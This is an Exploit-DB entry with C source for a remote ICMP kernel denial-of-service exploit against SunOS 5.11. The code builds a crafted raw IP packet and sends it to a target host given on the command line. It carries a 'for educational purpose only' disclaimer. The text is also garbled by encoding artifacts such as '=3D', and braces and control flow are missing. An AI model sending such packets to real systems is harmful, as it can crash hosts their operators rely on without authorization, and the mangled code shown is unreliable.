SunOS 5.11 ICMP - Denial of Service

ID EDB-ID:41142
Type exploitdb
Reporter Exploit-DB
Modified 2017-01-22T00:00:00


SunOS 5.11 ICMP - Denial of Service. Dos exploit for Unix platform

*  SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit
*  Todor Donev <>
*  Disclaimer:
*  This or previous programs is for Educational
*  purpose ONLY. Do not use it without permission.
*  The usual disclaimer applies, especially the
*  fact that Todor Donev is not liable for any
*  damages caused by direct or indirect use of the
*  information or functionality provided by these
*  programs. The author or any Internet provider
*  bears NO responsibility for content or misuse
*  of these programs or any derivatives thereof.
*  By using these programs you accept the fact
*  that any damage (dataloss, system crash,
*  system compromise, etc.) caused by the use
*  of these programs is not Todor Donev's
*  responsibility.
*  Use them at your own risk!

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
unsigned char b00m[75] =3D
    0x45, 0xFF, 0x00, 0x4D, 0x0C,
    0x52, 0x00, 0x00, 0x7E, 0x01,
    0x0C, 0xF2, 0x85, 0x47, 0x21,
    0x07, 0xC0, 0xA8, 0x0E, 0x58,
    0x03, 0x01, 0xAE, 0x37, 0x6F,
    0x3B, 0x66, 0xA7, 0x60, 0xAA,
    0x76, 0xC1, 0xEC, 0xA7, 0x7D,
    0xFA, 0x8A, 0x72, 0x8E, 0xC6,
    0xE3, 0xD2, 0x64, 0x13, 0xE7,
    0x4D, 0xBC, 0x01, 0x40, 0x5B,
    0x8E, 0x8B, 0xE5, 0xEE, 0x5E,
    0x37, 0xDD, 0xC2, 0x54, 0x8E,
    0x8D, 0xCE, 0x0C, 0x42, 0x97,
    0xA1, 0x8C, 0x04, 0x8A, 0xC2,=20
    0x6B, 0xAE, 0xE9, 0x2E, 0xFE,
} ;
    long   resolve(char *target){
    struct hostent *tgt;
    long   addr;
    tgt =3D gethostbyname(target);
if (tgt =3D=3D NULL)
int main(int argc, char *argv[]){
    struct  sockaddr_in dst;
    long    saddr, daddr;
    int     s0cket;
    printf("[ SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit\n");
    printf("[ Todor Donev <>\n"=
  if (argc < 2){
    printf("[ Usage: %s <target>\n", *argv);
  daddr   =3D resolve(argv[1]);
  saddr   =3D INADDR_ANY;
  memcpy(b00m+16, &daddr, sizeof(long));
  dst.sin_addr.s_addr   =3D daddr;
  dst.sin_family        =3D AF_INET;
  s0cket                =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s0cket =3D=3D -1)
    printf("[ ICMP Attacking: %s\n", argv[1]);
    if (sendto(s0cket,&b00m,75,0,(struct sockaddr *)&dst,sizeof(struct sock=
addr_in)) =3D=3D -1){
         perror("[ Error");